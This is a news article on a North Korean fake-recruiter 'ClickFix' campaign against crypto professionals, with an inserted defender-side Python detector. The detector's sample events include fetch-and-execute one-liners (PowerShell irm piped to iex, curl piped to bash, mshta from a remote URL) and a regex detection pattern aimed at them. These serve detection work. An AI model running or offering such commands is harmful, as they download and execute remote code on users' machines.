North Korean Hackers Pose as Recruiters to Target Blockchain Professionals Worldwide

A new wave of cyberattacks linked to North Korea has targeted hundreds of individuals globally, with a focus on professionals working in cryptocurrency-related fields. The campaign, which took place between March and June 2025, used fake job offers to trick victims into installing malware on their devices.

Cybersecurity researchers from SentinelLabs revealed that the attackers are part of a growing group of state-backed hacking operations using social engineering to bypass technical defenses. Their aim is financial: to steal crypto assets and generate revenue for North Korea’s sanctioned programs, including missile development.

The attackers pose as recruiters or job applicants, luring victims—primarily in blockchain, marketing, and finance sectors—into fake interview processes. Targets are invited to complete assessments in which they solve CAPTCHAs that appear legitimate but are actually used to deliver malicious code. A common method involves prompting users to copy and paste malware-laden scripts under the pretense of fixing errors, a tactic known as “ClickFix.”
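As an added defender-side illustration (not code from the article or from the SentinelLabs research), the following Python flags process-creation events that look like a ClickFix paste: a script host or shell launched from the Run dialog or a terminal with a command line that fetches remote content and executes it immediately. The events, parent process names and hostnames are constructed for this example.

```python
import re

# Constructed process-creation events in the shape a defender might export
# from an EDR; parent names, paths and hosts are invented for this example.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe",
     "cmd": 'powershell.exe -w hidden -c "irm https://captcha.example.invalid/fix.ps1 | iex"'},
    {"parent": "Terminal",
     "cmd": "curl -fsSL https://verify.example.invalid/fix.sh | bash"},
    {"parent": "code.exe",
     "cmd": "git pull origin main"},
    {"parent": "explorer.exe",
     "cmd": "notepad.exe C:\\Users\\dev\\notes.txt"},
    {"parent": "explorer.exe",
     "cmd": "cmd.exe /c mshta https://check.example.invalid/verify.hta"},
]

# Parents from which a user-pasted command typically originates: the Windows
# Run dialog spawns children from explorer.exe, a pasted line from a terminal.
PASTE_PARENTS = {"explorer.exe", "Terminal", "iTerm2", "gnome-terminal"}

# A remote fetch piped straight into an interpreter, or an HTA fetched over
# HTTP: the shape of a "fix this error" one-liner a ClickFix page hands out.
FETCH_AND_RUN = re.compile(
    r"\b(irm|iwr|invoke-(rest|web)request|curl|wget)\b.*\|\s*"
    r"(iex|invoke-expression|bash|sh|zsh|python)\b"
    r"|\bmshta\b\s+https?://",
    re.IGNORECASE,
)


def is_clickfix_like(event):
    """True when a paste-origin parent runs a fetch-and-execute command."""
    return event["parent"] in PASTE_PARENTS and bool(FETCH_AND_RUN.search(event["cmd"]))


def find_suspicious(events):
    """Return the command lines worth a triage ticket."""
    return [e["cmd"] for e in events if is_clickfix_like(e)]


if __name__ == "__main__":
    for cmd in find_suspicious(SAMPLE_EVENTS):
        print("ClickFix-like:", cmd)
```

Real deployments should pair this with clipboard or Run-dialog history (e.g. the RunMRU registry key on Windows) so that the pasted text is captured even when the interpreter command line is obfuscated.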

Behind the scenes, the campaign abuses popular cyber intelligence tools to monitor for signs that its infrastructure has been discovered. Logs exposed from misconfigured North Korean servers showed the operators using platforms such as VirusTotal and Maltrail, and commercial threat intelligence services such as Validin, to track whether their malware or domains had been flagged.

In one example, the attackers monitored hiring-related domains that were available for purchase and acquired them to build realistic fake websites. Once a site was active, they watched for detection signals and quickly moved to new infrastructure as soon as any appeared. According to researchers, this pattern suggests that rather than investing in more robust long-term infrastructure, the teams simply rotate assets as needed.

The attacks appear to be carried out in coordinated groups, with Slack used for real-time collaboration and the sharing of URLs. SentinelLabs notes that poor operational security by the attackers led to the unintentional exposure of logs, directories, and internal files, giving researchers a rare window into how these campaigns operate.

Security teams have since worked to shut down fake recruitment sites, email accounts, IP addresses, and malware servers linked to the operation. However, the broader infrastructure remains active, and more incidents are expected.